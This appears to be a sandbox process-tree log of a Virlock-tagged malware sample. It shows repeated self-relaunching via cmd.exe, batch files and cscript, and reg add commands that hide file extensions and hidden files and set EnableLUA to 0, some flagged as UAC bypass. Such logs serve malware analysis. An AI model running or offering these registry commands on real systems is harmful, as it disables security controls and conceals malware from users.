\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
191⤵
PID:1824

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
191⤵
PID:764

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
192⤵
PID:1608

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
193⤵
PID:1612

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
194⤵
PID:4868

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
195⤵
PID:2448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
196⤵
PID:1864

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
197⤵
PID:5080

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
198⤵
PID:1568

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
199⤵
PID:1396

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
198⤵
PID:2600

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
198⤵
- UAC bypass
PID:1456

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
196⤵
- Modifies visibility of file extensions in Explorer
PID:5060

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
196⤵
- Modifies registry key
PID:2616

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
196⤵
- UAC bypass
PID:4064

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
197⤵
PID:3520

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kCAAQoYw.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
196⤵
PID:1536

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
197⤵
PID:3552

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
194⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:4800

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
194⤵
PID:4040

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
195⤵
PID:1884

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
194⤵
- UAC bypass
PID:1188

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MCMcAIsY.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
194⤵
PID:2148

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
195⤵
PID:4460

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
192⤵
- Modifies visibility of file extensions in Explorer
PID:1716

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
192⤵
PID:900

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
192⤵
- Modifies registry key
PID:3752

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
193⤵
PID:1028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NcoIwkMs.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
192⤵
PID:1452

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
193⤵
PID:116

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
193⤵
PID:4652

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
190⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:2480

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
190⤵
PID:1436

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
191⤵
PID:2956

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
190⤵
PID:2988

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
191⤵
PID:3924

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rsAAQoYc.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
190⤵
PID:3252

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
191⤵
PID:372

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
188⤵
- Modifies visibility of file extensions in Explorer
PID:4388

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
189⤵
PID:2504

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
188⤵
PID:1656

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
189⤵
PID:4060

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
188⤵
PID:2968

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
189⤵
PID:3260

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JMEMIIIQ.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
188⤵
PID:2744

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
189⤵
PID:3768

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
189⤵
PID:1088

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
186⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:224

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
187⤵
PID:3744

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
186⤵
PID:4676

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
186⤵
- UAC bypass
- Modifies registry key
PID:4548

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
187⤵
PID:3480

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UqoswUkk.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
186⤵
PID:3312

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
187⤵
PID:3864

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
184⤵
PID:2684

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
184⤵
PID:1808

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
184⤵
PID:4200

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
185⤵
PID:5064

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UcwIEssU.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
184⤵
PID:3428

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
185⤵
PID:3108

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
182⤵
- Modifies visibility of file extensions in Explorer
PID:4168

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
182⤵
- Modifies registry key
PID:2436

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
183⤵
PID:3040

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
182⤵
- UAC bypass
PID:116

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ciEYscgk.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
182⤵
PID:3700

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
183⤵
PID:3028

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
180⤵
PID:3684

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
180⤵
PID:3372

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
180⤵
- UAC bypass
PID:2424

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WCosAoEA.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
180⤵
PID:1136

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
181⤵
PID:208

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
178⤵
- Modifies visibility of file extensions in Explorer
PID:4524

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
179⤵
PID:2324

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
178⤵
PID:4316

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
178⤵
- UAC bypass
PID:384

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fQMsIwUs.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
178⤵
PID:392

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
179⤵
PID:3988

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
176⤵
- Modifies visibility of file extensions in Explorer
PID:3520

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
176⤵
PID:1744

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
176⤵
- UAC bypass
PID:2284

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JsQAssMU.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
176⤵
PID:1856

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
177⤵
PID:3068

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
174⤵
- Modifies visibility of file extensions in Explorer
PID:1180

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
174⤵
PID:4372

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
175⤵
PID:2372

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
174⤵
- UAC bypass
PID:5064

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xOMMUQQc.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
174⤵
PID:3108

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
175⤵
PID:4544

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
172⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:1588

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
172⤵
PID:3040

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
172⤵
- UAC bypass
- Modifies registry key
PID:3156

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
173⤵
PID:4884

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EiccQsAg.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
172⤵
PID:4688

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
173⤵
PID:1716

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
170⤵
- Modifies visibility of file extensions in Explorer
PID:1012

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
170⤵
PID:2956

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
170⤵
- UAC bypass
- Modifies registry key
PID:4772

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
171⤵
PID:1252

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yMkEIwMY.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
170⤵
PID:3276

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
171⤵
PID:4764

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
168⤵
- Modifies visibility of file extensions in Explorer
PID:392

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
169⤵
PID:4384

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
168⤵
PID:3260

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
169⤵
PID:3420

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
168⤵
PID:1088

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MeMkoQMk.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
168⤵
PID:3064

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
169⤵
PID:3436

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
166⤵
PID:32

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
166⤵
- Modifies registry key
PID:1396

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
166⤵
PID:1864

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LwwcUMYA.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
166⤵
PID:3480

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
167⤵
PID:3952

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
164⤵
- Modifies visibility of file extensions in Explorer
PID:2716

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
164⤵
PID:5060

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
164⤵
- UAC bypass
- Modifies registry key
PID:1536

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vKwMYccw.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
164⤵
PID:320

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
165⤵
PID:4232

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
165⤵
PID:724

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
162⤵
PID:4628

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
162⤵
PID:3476

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
162⤵
- UAC bypass
- Modifies registry key
PID:4884

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DyUogcoU.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
162⤵
PID:432

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
163⤵
PID:436

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
160⤵
- Modifies visibility of file extensions in Explorer
PID:4968

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
160⤵
PID:3136

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
160⤵
PID:4328

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HyUkkcgQ.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
160⤵
PID:5048

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
161⤵
PID:4764

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
158⤵
- Modifies visibility of file extensions in Explorer
PID:4060

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
158⤵
PID:5092

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
158⤵
- UAC bypass
PID:1436

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
159⤵
PID:3768

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\muYMMMIg.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
158⤵
PID:4912

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
159⤵
PID:3940

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
159⤵
PID:3436

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
156⤵
PID:1952

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
156⤵
PID:1456

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
156⤵
- UAC bypass
PID:4548

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gqQkMoAI.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
156⤵
PID:4056

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
157⤵
PID:3484

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
154⤵
- Modifies visibility of file extensions in Explorer
PID:4380

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
155⤵
PID:4512

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
154⤵
PID:1760

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
154⤵
PID:3796

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GcAgEQoM.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
154⤵
PID:1884

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
155⤵
PID:4528

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
152⤵
- Modifies visibility of file extensions in Explorer
PID:1028

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
152⤵
PID:3400

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
152⤵
- UAC bypass
PID:4628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kAYQUYcc.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
152⤵
PID:920

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
153⤵
PID:1828

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
150⤵
PID:3768

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
150⤵
PID:4060

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
150⤵
- UAC bypass
- Modifies registry key
PID:1084

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LuAYIMsk.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
150⤵
PID:5084

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
151⤵
PID:4384

C:\Windows\SysWOW64\reg.exe
